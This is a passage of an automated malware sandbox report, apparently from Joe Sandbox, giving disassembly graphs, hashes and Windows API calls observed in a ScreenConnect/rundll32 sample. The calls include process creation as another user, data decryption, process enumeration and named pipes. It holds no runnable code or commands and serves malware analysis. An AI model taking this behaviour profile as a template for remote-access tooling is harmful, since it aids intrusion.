                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 078f1c90c04a6c5a335b92dbf8092efddc17920755a8a1581e9dc021745bb737
                                                                                                                                          • Instruction ID: 77fe5cd1d6548a2fd7c8daaf8adc0fad2185729584e167385b20af96baace079
                                                                                                                                          • Opcode Fuzzy Hash: 078f1c90c04a6c5a335b92dbf8092efddc17920755a8a1581e9dc021745bb737
                                                                                                                                          • Instruction Fuzzy Hash: D9D05E70A1120CEFDF40EFB8EA0255DBBB9EB45214F1085A8E80DD3241EE322F009F91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000003.1083157773.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_3_72c0000_rundll32.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b362f5102ab62d928b40cace51da6cc746bf7bda6fc70ea08c9da97bc2fa611a
                                                                                                                                          • Instruction ID: cb57b70e221a5856610fd008d391a6031482d5e8cc5c0bb47d7f35c804c73d9b
                                                                                                                                          • Opcode Fuzzy Hash: b362f5102ab62d928b40cace51da6cc746bf7bda6fc70ea08c9da97bc2fa611a
                                                                                                                                          • Instruction Fuzzy Hash: 47C08CF3F69A115BE312808C4CD22DB2731DAB3A0D7CCD2C6C0C08800FB1262117C260

Execution Graph

Execution Coverage: 11.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 6.2%
Total number of Nodes: 113
Total number of Limit Nodes: 9

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 267 5ef2280-5ef22d1 268 5ef22dc-5ef22e0 267->268 269 5ef22d3-5ef22d9 267->269 270 5ef22e8-5ef22fd 268->270 271 5ef22e2-5ef22e5 268->271 269->268 272 5ef22ff-5ef2308 270->272 273 5ef230b-5ef2362 CreateProcessAsUserW 270->273 271->270 272->273 274 5ef236b-5ef2393 273->274 275 5ef2364-5ef236a 273->275 275->274
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EF234F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateProcessUser
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2217836671-0
                                                                                                                                          • Opcode ID: 36b3f446f86c2daf6fac3eacbc16b0429499c957a3133772409ecf148dd7990b
                                                                                                                                          • Instruction ID: 83f53d1a34d9a3f7f7ba0a2a347aaec175b1bd1db128e8201a2ddd6a25395ba2
                                                                                                                                          • Opcode Fuzzy Hash: 36b3f446f86c2daf6fac3eacbc16b0429499c957a3133772409ecf148dd7990b
                                                                                                                                          • Instruction Fuzzy Hash: 3241477690020ADFDF10CFA9C884ADEBBF6FF48310F14852AEA58A7250D735A955CF90

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 353 48716f1-4871738 354 4871740-4871781 CryptProtectData 353->354 355 487173a-487173d 353->355 356 4871783-4871789 354->356 357 487178a-48717b2 354->357 355->354 356->357
                                                                                                                                          APIs
                                                                                                                                          • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 0487176E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2345977695.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_4870000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataProtect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3091777813-0
                                                                                                                                          • Opcode ID: 76701f797e5c6b362d053f63a004f096b5e99e9986781711254ba367e3f5bddd
                                                                                                                                          • Instruction ID: c7fa2429a56aeb2e1e262fa90c855d31f71b325e28a383f7ae3aa32c138ae192
                                                                                                                                          • Opcode Fuzzy Hash: 76701f797e5c6b362d053f63a004f096b5e99e9986781711254ba367e3f5bddd
                                                                                                                                          • Instruction Fuzzy Hash: 662116768002499FCB21CF99C844ADEBBB1FF48350F14851AE969A7211C739A555CFA1

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 360 48716f8-4871738 361 4871740-4871781 CryptProtectData 360->361 362 487173a-487173d 360->362 363 4871783-4871789 361->363 364 487178a-48717b2 361->364 362->361 363->364
                                                                                                                                          APIs
                                                                                                                                          • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 0487176E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2345977695.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_4870000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataProtect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3091777813-0
                                                                                                                                          • Opcode ID: 11856000f7730cbeaab5d72fac2d8a6368abaef5a3bed8fcbbaabb2bcbef2bb5
                                                                                                                                          • Instruction ID: 0ba7b4e1fc3b5fbf27e6b20455671794b5107aca34945dbcdaa7f29c2e21887d
                                                                                                                                          • Opcode Fuzzy Hash: 11856000f7730cbeaab5d72fac2d8a6368abaef5a3bed8fcbbaabb2bcbef2bb5
                                                                                                                                          • Instruction Fuzzy Hash: 6A2107B68002499FDF11CF9AC844ADEBBB5FF48350F14851AE914A7210C379A555DFA1

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 375 5d92d68-5d92de8 CryptUnprotectData 377 5d92dea-5d92df0 375->377 378 5d92df1-5d92e19 375->378 377->378
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05D92DD5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: b174d12925208f6de53b225aa2258390b39eb40f7c07c3f2b2f8c1361146023a
                                                                                                                                          • Instruction ID: 8b3380f87d463450f7dcfa94b56ca025782aea28b9031aee90c23bda623707ca
                                                                                                                                          • Opcode Fuzzy Hash: b174d12925208f6de53b225aa2258390b39eb40f7c07c3f2b2f8c1361146023a
                                                                                                                                          • Instruction Fuzzy Hash: 6F2106B680024AAFDF10CF99C845BDEBBF5EF48320F14841AEA14A7350D339A555DFA5
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05D92DD5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: 62a150c68de6b653f7c3cf978334da94aa558130a7ee2e4ab9ddc83db737fe57
                                                                                                                                          • Instruction ID: 753e2da8d221add4ba78672120160e2886412dd6368aef286dbb2185e2fa0bb1
                                                                                                                                          • Opcode Fuzzy Hash: 62a150c68de6b653f7c3cf978334da94aa558130a7ee2e4ab9ddc83db737fe57
                                                                                                                                          • Instruction Fuzzy Hash: E92114B680024ADFDF20CF99C845BDEBBF4EF48320F14841AEA14A7250D339A555DFA5

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 149 5d96508-5d9651d 150 5d9651f-5d96522 149->150 151 5d96532-5d96539 149->151 152 5d96528-5d96531 150->152 153 5d965ec-5d96600 150->153 154 5d9653e-5d96582 call 5d95e70 151->154 155 5d96602 153->155 156 5d965c6-5d965cf 153->156 175 5d96587-5d9658c 154->175 160 5d9660e-5d96617 155->160 157 5d9662c-5d96640 156->157 158 5d965d1-5d965eb 156->158 163 5d96699 157->163 164 5d96642-5d9668e 157->164 165 5d9669a-5d966d0 K32EnumProcesses 163->165 164->165 168 5d96690-5d96698 164->168 169 5d966d9-5d96701 165->169 170 5d966d2-5d966d8 165->170 168->165 170->169 176 5d96618-5d96625 175->176 177 5d96592-5d96595 175->177 176->157 178 5d96604-5d96609 177->178 179 5d96597-5d965c4 177->179 178->154 179->156 179->160
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: baff3a7c29b697960b9bc3e2677f54180bbc3482516b6087c4af7a4a07366c35
                                                                                                                                          • Instruction ID: d0c6c9eb61e4676cafa67856339be480e6ea5d85cf73fd1fc4bbaf40e4415c78
                                                                                                                                          • Opcode Fuzzy Hash: baff3a7c29b697960b9bc3e2677f54180bbc3482516b6087c4af7a4a07366c35
                                                                                                                                          • Instruction Fuzzy Hash: E4519C71A007058FCB24CFAAD880AAEBBF5FF88310F14896ED55AD3651D734E945CBA1

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 184 5effb54-5effb5d 185 5effb5f-5effbbc 184->185 186 5effb32-5effb43 call 5efe9e8 184->186 188 5effbbe-5effbe3 185->188 189 5effc10-5effc93 CreateFileA 185->189 192 5effb48-5effb4a 186->192 188->189 194 5effbe5-5effbe7 188->194 200 5effc9c-5effcda 189->200 201 5effc95-5effc9b 189->201 195 5effc0a-5effc0d 194->195 196 5effbe9-5effbf3 194->196 195->189 198 5effbf7-5effc06 196->198 199 5effbf5 196->199 198->198 202 5effc08 198->202 199->198 206 5effcdc-5effce0 200->206 207 5effcea 200->207 201->200 202->195 206->207 208 5effce2 206->208 209 5effceb 207->209 208->207 209->209
                                                                                                                                          APIs
                                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05EFFC7D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                          • Opcode ID: c90932ee98cdb8bcf3bdca8416d70a959f917516722ff53be8eee6325c59f890
                                                                                                                                          • Instruction ID: 240d86c4e3a07c22c4cca06a6fb7a35d64a7fa0849197fe9f3dbec6ff7b088c5
                                                                                                                                          • Opcode Fuzzy Hash: c90932ee98cdb8bcf3bdca8416d70a959f917516722ff53be8eee6325c59f890
                                                                                                                                          • Instruction Fuzzy Hash: FF518BB1E003599FDB10CFA8C845B9DBBF1FB08308F248029E958AB391DBB59841CF95

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 210 5effb60-5effbbc 211 5effbbe-5effbe3 210->211 212 5effc10-5effc93 CreateFileA 210->212 211->212 215 5effbe5-5effbe7 211->215 221 5effc9c-5effcda 212->221 222 5effc95-5effc9b 212->222 216 5effc0a-5effc0d 215->216 217 5effbe9-5effbf3 215->217 216->212 219 5effbf7-5effc06 217->219 220 5effbf5 217->220 219->219 223 5effc08 219->223 220->219 227 5effcdc-5effce0 221->227 228 5effcea 221->228 222->221 223->216 227->228 229 5effce2 227->229 230 5effceb 228->230 229->228 230->230
                                                                                                                                          APIs
                                                                                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05EFFC7D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                          • Opcode ID: cb3723d4d6708c3a29db3f5ad8509c6cc8a63dc2725c69e4b3de04c6cd7b3e4c
                                                                                                                                          • Instruction ID: 1e84903700a762ece2093e6b53183eb3ca9e9e94466dde560d985d11d4f1e899
                                                                                                                                          • Opcode Fuzzy Hash: cb3723d4d6708c3a29db3f5ad8509c6cc8a63dc2725c69e4b3de04c6cd7b3e4c
                                                                                                                                          • Instruction Fuzzy Hash: 134169B1D002599FDB10CFA9C844B8EBBF1FB48308F248129E958AB351DB759841CF91

Control-flow Graph
• Rendered graph not reproduced; entry block at 1fe4c6c, calls RtlGetVersion
APIs
• RtlGetVersion.NTDLL(0000009C), ref: 01FE4DBE
Memory Dump Source
• Source File: 00000008.00000002.2321434360.0000000001FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1fe0000_ScreenConnect.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 8f1ba4825d7868cbafc5036bf825d0196b188ac52acb98a9912d1780baa70207
• Instruction ID: 2ed2aa4d0582fe6b87ef4a2d790fcb9ea29cad0e4d0fd7c4321263d1c0455328
• Opcode Fuzzy Hash: 8f1ba4825d7868cbafc5036bf825d0196b188ac52acb98a9912d1780baa70207
• Instruction Fuzzy Hash: 5F417F71E00359DFEB60DF68C818BADBBB5FB44300F0085AAD609E7290DB759985CF92

Control-flow Graph
• Rendered graph not reproduced; entry block at 5ef2278, calls CreateProcessAsUserW
APIs
• CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EF234F
Memory Dump Source
• Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 609f0802c80020847a713c7c60726d25b19cd4518a67736f64cb8e744ab4229d
• Instruction ID: 1a3568454fa18ce61f214b8ecb825e467df0a2f3eab72ca61e9d7ccf500f06c0
• Opcode Fuzzy Hash: 609f0802c80020847a713c7c60726d25b19cd4518a67736f64cb8e744ab4229d
• Instruction Fuzzy Hash: 9B41477690020ADFDF10CFA9C880ADEBBF5FF48310F04842AEA58A7250D734A955CF50

Control-flow Graph
• Rendered graph not reproduced; entry block at 5d95e70, calls K32EnumProcesses
APIs
• K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05D966BD
Memory Dump Source
• Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
Similarity
• API ID: EnumProcesses
• String ID:
• API String ID: 84517404-0
• Opcode ID: 6b31f481474ce67acba71638ff8cd0f9dcba95cbd7f71f6f207ae656c556d3e6
• Instruction ID: 8b99afc043d2791ddb2f8a472a75aa96bb5239acaded0ed88df54a5f81b93cb6
• Opcode Fuzzy Hash: 6b31f481474ce67acba71638ff8cd0f9dcba95cbd7f71f6f207ae656c556d3e6
• Instruction Fuzzy Hash: 722145B5D002499FDB14CF9AC884BDEBBF4FB48310F10846EE918A7300C338A941CBA4

Control-flow Graph
• Rendered graph not reproduced; entry block at 5ef174c, calls WaitNamedPipeW
APIs
• WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05EF2646), ref: 05EF26EF
Memory Dump Source
• Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
Similarity
• API ID: NamedPipeWait
• String ID:
• API String ID: 3146367894-0
• Opcode ID: aa74b129856c1c4d2d6b1d77dc05911a5886707e17b949688551bdf8ac11fc16
• Instruction ID: dce1c50727cda776971350021b7132cdd9d4974c7d99a3d44902a9836f0da418
• Opcode Fuzzy Hash: aa74b129856c1c4d2d6b1d77dc05911a5886707e17b949688551bdf8ac11fc16
• Instruction Fuzzy Hash: 172147B6C002498FDB20CF9AC844BEEBBF4FB48314F11842ED959A7241C778A545CFA1

Control-flow Graph
• Rendered graph not reproduced; entry block at 5ef2680, calls WaitNamedPipeW
APIs
• WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05EF2646), ref: 05EF26EF
Memory Dump Source
• Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
Similarity
• API ID: NamedPipeWait
• String ID:
• API String ID: 3146367894-0
• Opcode ID: 210ff64684301cf4e639f6b52f937cd6d44de87800676d4f6cf5b1106f3483e7
• Instruction ID: eca4b99486d2c3ecdc8b90f6e401fa431f06fbd23fd42aae542eadfd2b1d523b
• Opcode Fuzzy Hash: 210ff64684301cf4e639f6b52f937cd6d44de87800676d4f6cf5b1106f3483e7
• Instruction Fuzzy Hash: EC2136B6C002098FDB24CF99C845BEEBBF4BF48314F15841ED959A7240C779A545CFA1
APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D9679E
Memory Dump Source
• Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0
• Opcode ID: ff60cf17149e6890ea2e3abd46d1fcc81caea032715c3ea959bd058967162ccc
• Instruction ID: 1e3df38187e695cb7d84d31a171ef7b666247b1e1d0029bb44f8a210d03fbbb6
• Opcode Fuzzy Hash: ff60cf17149e6890ea2e3abd46d1fcc81caea032715c3ea959bd058967162ccc
• Instruction Fuzzy Hash: D71142B5C002498FCB20CF9AC444BEEBBF4FB48324F10842AE818A7200C378A944CFA1
APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D9679E
Memory Dump Source
• Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0
• Opcode ID: 7a0d32fea12804e404d201ba29c7c7a0ab5771584733a3b135bd8bba2d075605
• Instruction ID: 3740c649347442884c517866dfe6b42e9ac2be206a49a0b8f9c50c03e92a0e9e
• Opcode Fuzzy Hash: 7a0d32fea12804e404d201ba29c7c7a0ab5771584733a3b135bd8bba2d075605
• Instruction Fuzzy Hash: F31112B6C002498FCB20CF9AC444BDEBBF4FB48324F14842AE958A7240C778A945CFA1
APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D9679E
Memory Dump Source
• Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0
• Opcode ID: 733377e0aa6d90ab60e546d5928a5e437becd7af384838e43a4d113523b0b9f7
• Instruction ID: e476069fa6f6d151cd2ffa75663fe2c32aa2ab9d5ec67582aeb20c71ecbbdf44
• Opcode Fuzzy Hash: 733377e0aa6d90ab60e546d5928a5e437becd7af384838e43a4d113523b0b9f7
• Instruction Fuzzy Hash: BB1105758042098FDF24CFA9D80479EBBF0AF88324F15C49AD498A7251C739A946CF61
Memory Dump Source
• Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9ecdaefa9e852412370f07b483806deecaee4aae0aee79e744a318a9cd07e01
• Instruction ID: d5427b1e73084a0268e01b05decb7e82c6d176cba9e1fb9dea47dc52f0a43805
• Opcode Fuzzy Hash: b9ecdaefa9e852412370f07b483806deecaee4aae0aee79e744a318a9cd07e01
• Instruction Fuzzy Hash: 9F2137B6504280DFDB16DF58D9C0B2ABF65FB98320F20C569E9090B257C33BD856CBA1
Memory Dump Source
• Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d05a3e31c280b3a5cc5f815455a6480bec6afe6824d766976a72ef6ec818cf4
• Instruction ID: 382e39b0b2c581ecfbfddcc17b70333302116fa591c1e68676073c09c7c7add8
• Opcode Fuzzy Hash: 4d05a3e31c280b3a5cc5f815455a6480bec6afe6824d766976a72ef6ec818cf4
• Instruction Fuzzy Hash: D411D376904280CFDB16CF54D9C4B1ABF72FB98320F24C6A9D9094B257C33AD45ACBA1
Memory Dump Source
• Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b60e192063bb5e11f8ea8bc1bd086f5e0d0478212126bf990499d86dd48f87d7
• Instruction ID: f7b150ff98084a035bd9159595e135c09b0e4c68194b8291d0b52bafc2c4a1b9
• Opcode Fuzzy Hash: b60e192063bb5e11f8ea8bc1bd086f5e0d0478212126bf990499d86dd48f87d7
• Instruction Fuzzy Hash: 1501A772404340DBE7218A5DCC84B66BF98EF512B4F18C11AED4D4B28BC27A9542CAB1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cb459593104f41a680cf930b634ab8d89564b85ffd7029727e2be39b121c881a
                                                                                                                                          • Instruction ID: a946c975b7c7a5ac900c57b135aed34df037b553cb20fd1ff878c2ddadbde242
                                                                                                                                          • Opcode Fuzzy Hash: cb459593104f41a680cf930b634ab8d89564b85ffd7029727e2be39b121c881a
                                                                                                                                          • Instruction Fuzzy Hash: BC01127140D3C09FE7138B298894B52BFB4EF53264F19C1DBE9888F1A7C2699845C772

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:16%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:37.5%
                                                                                                                                          Total number of Nodes:8
                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                          execution_graph 11398 7ff9cc3b8014 11399 7ff9cc3b801d 11398->11399 11400 7ff9cc3b8001 11399->11400 11401 7ff9cc3b80f6 SetProcessMitigationPolicy 11399->11401 11402 7ff9cc3b8152 11401->11402 11394 7ff9cc3b3642 11395 7ff9cc3d5850 CreateNamedPipeW 11394->11395 11397 7ff9cc3d5983 11395->11397

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 355 7ff9cc6c5d61-7ff9cc6c5d94 call 7ff9cc6c44e0 call 7ff9cc6c0d60 * 2 363 7ff9cc6c5d9a-7ff9cc6c5da8 355->363 364 7ff9cc6c6b2e-7ff9cc6c6b41 355->364 366 7ff9cc6c5daa-7ff9cc6c5dac 363->366 367 7ff9cc6c5dae-7ff9cc6c5dbd call 7ff9cc6c0120 363->367 368 7ff9cc6c5dc0-7ff9cc6c5dc2 366->368 367->368 371 7ff9cc6c5f02-7ff9cc6c5f05 368->371 372 7ff9cc6c5dc8-7ff9cc6c5de4 368->372 373 7ff9cc6c5f0b-7ff9cc6c5f16 371->373 374 7ff9cc6c6040-7ff9cc6c6047 371->374 372->371 391 7ff9cc6c5dea-7ff9cc6c5dfc 372->391 375 7ff9cc6c5f62-7ff9cc6c5f70 373->375 376 7ff9cc6c5f18-7ff9cc6c5f35 373->376 378 7ff9cc6c60d7-7ff9cc6c60de 374->378 379 7ff9cc6c604d-7ff9cc6c6054 374->379 375->374 385 7ff9cc6c6b4b-7ff9cc6c6b5c 376->385 386 7ff9cc6c5f3b-7ff9cc6c5f60 376->386 381 7ff9cc6c60e9-7ff9cc6c60fc 378->381 382 7ff9cc6c60e0-7ff9cc6c60e7 378->382 379->378 384 7ff9cc6c605a-7ff9cc6c6064 379->384 400 7ff9cc6c60fe-7ff9cc6c6103 381->400 401 7ff9cc6c610d-7ff9cc6c6115 381->401 382->381 388 7ff9cc6c6126-7ff9cc6c612d 382->388 384->388 394 7ff9cc6c606a-7ff9cc6c60d5 384->394 438 7ff9cc6c6b5d-7ff9cc6c6b6e 385->438 386->375 389 7ff9cc6c6133-7ff9cc6c613a 388->389 390 7ff9cc6c6391-7ff9cc6c6398 388->390 389->390 395 7ff9cc6c6140-7ff9cc6c6143 389->395 390->364 397 7ff9cc6c639e-7ff9cc6c63a5 390->397 398 7ff9cc6c5e4a-7ff9cc6c5e91 391->398 399 7ff9cc6c5dfe-7ff9cc6c5e1b 391->399 394->388 405 7ff9cc6c6145-7ff9cc6c6147 395->405 406 7ff9cc6c614c-7ff9cc6c615a 395->406 397->364 408 7ff9cc6c63ab-7ff9cc6c63bd 397->408 450 7ff9cc6c5ed4-7ff9cc6c5ed6 398->450 451 7ff9cc6c5e93-7ff9cc6c5e9d 398->451 418 7ff9cc6c6b42-7ff9cc6c6b4a 399->418 419 7ff9cc6c5e21-7ff9cc6c5e48 399->419 400->401 411 7ff9cc6c6b81-7ff9cc6c6c58 401->411 412 7ff9cc6c611b-7ff9cc6c611f 401->412 415 7ff9cc6c61fa-7ff9cc6c61fd 405->415 431 7ff9cc6c615c 406->431 432 7ff9cc6c615e 406->432 416 7ff9cc6c6409-7ff9cc6c6421 
